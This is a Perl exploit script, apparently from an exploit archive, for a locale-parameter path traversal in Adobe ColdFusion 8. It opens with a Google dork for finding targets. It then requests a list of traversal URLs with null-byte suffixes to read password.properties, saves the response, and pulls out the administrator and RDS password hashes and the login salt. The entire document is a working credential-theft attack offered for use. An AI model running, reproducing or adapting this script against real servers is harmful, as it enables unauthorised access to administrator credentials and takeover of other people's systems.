#!/usr/bin/perl
# ColdFusion Locale File Disclosure exploit (without Metasploit)
# Google Dork: intitle:"Index of /CFIDE/" administrator
# Date: 30/07/2013
# Vendor Homepage: http://www.adobe.com/
# Author: D35m0nd142
# Tested on: Adobe ColdFusion 8 (using Backbox Linux operating system)
use
LWP::UserAgent;
use
HTTP::Request;
$agent
= LWP::UserAgent->new();
$agent
->agent(
'Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02'
);
$target
=
$ARGV
[0];
system
(
"clear"
);
print
"+--------------------------------------------------------+\n"
;
print
" ColdFusion Locale File Disclosure exploit \n"
;
print
" created by D35m0nd142 \n"
;
print
"+--------------------------------------------------------+\n"
;
sleep
1;
if
(
$target
eq
''
)
{
print
"Usage: perl cfexploit.pl <target>\n"
;
exit
(1);
}
if
(
$target
!~ /http:\/\// )
{
}
@hosts
= (
"$target/CFIDE/administrator/index.cfm?locale=../../../../../../ColdFusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/index.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/index.cfm?locale=../../../../../../../../ColdFusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/index.cfm?locale=../../../../../../../../../ColdFusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en"
,
"$target/CFIDE/wizards/common/_logintowizard.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en"
,
"$target/CFIDE/wizards/common/_logintowizard.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/archives/index.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/archives/index.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/entman/index.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/entman/index.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en"
,
"$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../JRun4/servers/cfusion/cfusion-ear/cfusion-war/WEB-INF/cfusion/lib/password.properties%00en"
);
print
"\n... Exploiting ... \n"
;
foreach
$host
(
@hosts
)
{
$req
=
$agent
->request(HTTP::Request->new(GET=>
$host
));
if
(
$req
->is_success &&
$req
->content !~ /Not Found/ &&
$req
->content !~ /Page not found/ &&
$req
->content !~ /Forbidden/ &&
$req
->content =~ /rdspassword=/ )
{
print
"\n[+] Vulnerable URL: $host \n\n"
;
open
(FILE,
"> cf_content.txt"
);
print
FILE
$req
->content;
close
(FILE);
$grep
=
"grep 'password=' cf_content.txt > passwords.txt"
;
$head
=
"head -n 2 passwords.txt"
;
system
(
$grep
);
print
"+-------------------------------------------------+\n"
;
print
" [+] ColdFusion passwords: \n"
;
print
"___________________________________________________\n"
;
system
(
$head
);
print
"___________________________________________________\n"
;
sleep
1;
print
"\n... Retrieving SALT ... \n\n"
;
sleep
1;
$grep
=
"grep '<input name=\"salt\" type=\"hidden\" value=' cf_content.txt > cf_salt.txt"
;
$salt_cut
=
"cut -d '=' -f 4 cf_salt.txt > cf_salt1.txt"
;
$salt_cut1
=
"cut -d '\"' -f 2 cf_salt1.txt > cf_salt2.txt"
;
system
(
$grep
);
system
(
$salt_cut
);
system
(
$salt_cut1
);
print
"+---------------------------+"
;
print
"\n [+] SALT: \n"
;
print
"_____________________________\n"
;
system
(
"cat cf_salt2.txt"
);
print
"_____________________________\n"
;
sleep
(1.3);
exit
(0);
}
else
{
open
(FILE,
">> cf_content.txt"
);
print
FILE
"[-] not vulnerable!"
;
close
(FILE);
}
}